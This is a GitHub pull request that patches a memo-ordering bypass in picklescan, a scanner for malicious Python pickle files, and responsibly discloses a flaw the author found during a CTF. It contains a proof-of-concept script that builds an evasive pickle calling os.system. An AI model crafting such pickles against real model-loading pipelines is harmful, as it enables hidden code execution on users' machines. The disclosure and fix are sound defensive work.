### PR TITLE
Patched memo vulnerability

### DIFF
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,6 +1,6 @@
 [metadata]
 name = picklescan
-version = 0.0.12
+version = 0.0.13
 author = Matthieu Maitre
 author_email = mmaitre314@users.noreply.github.com
 description = Security scanner detecting Python Pickle files performing suspicious actions

--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -190,7 +190,7 @@ def _list_globals(data: IO[bytes], multiple_pickles=True) -> Set[Tuple[str, str]
             op_value = op[1]
 
             if op_name in ["MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"] and n > 0:
-                memo[len(memo)] = ops[n - 1][1]
+                memo[op_value] = ops[n - 1][1]
 
             if op_name in ("GLOBAL", "INST"):
                 globals.add(tuple(op_value.split(" ", 1)))


### PR DESCRIPTION
quick fix for https://github.com/mmaitre314/picklescan/issues/22

I felt bad for solving the challenge on the Imaginary ctf but not disclosing the vulnerability, so I am making this pull request

it patches the case where the memo is not in order.

```py
import pickle, base64

pkl = b''.join([
    pickle.UNICODE + b'os\n',
    pickle.PUT + b'2\n',
    pickle.POP,
    pickle.UNICODE + b'system\n',
    pickle.PUT + b'3\n',
    pickle.POP,
    pickle.UNICODE + b'torch\n',
    pickle.PUT + b'0\n',
    pickle.POP,
    pickle.UNICODE + b'LongStorage\n',
    pickle.PUT + b'1\n',
    pickle.POP,

    pickle.GET + b'2\n',
    pickle.GET + b'3\n',
    pickle.STACK_GLOBAL,

    pickle.MARK,
    pickle.UNICODE + b'cat flag.txt\n',
    pickle.TUPLE,

    pickle.REDUCE
]) + b'.'
print(base64.b64encode(pkl).decode())
```

perhaps another idea is that pickles could be checked to make sure the memo is in order (pickler always does memo from 0 counting up from what i can see, so any other order is suspicious)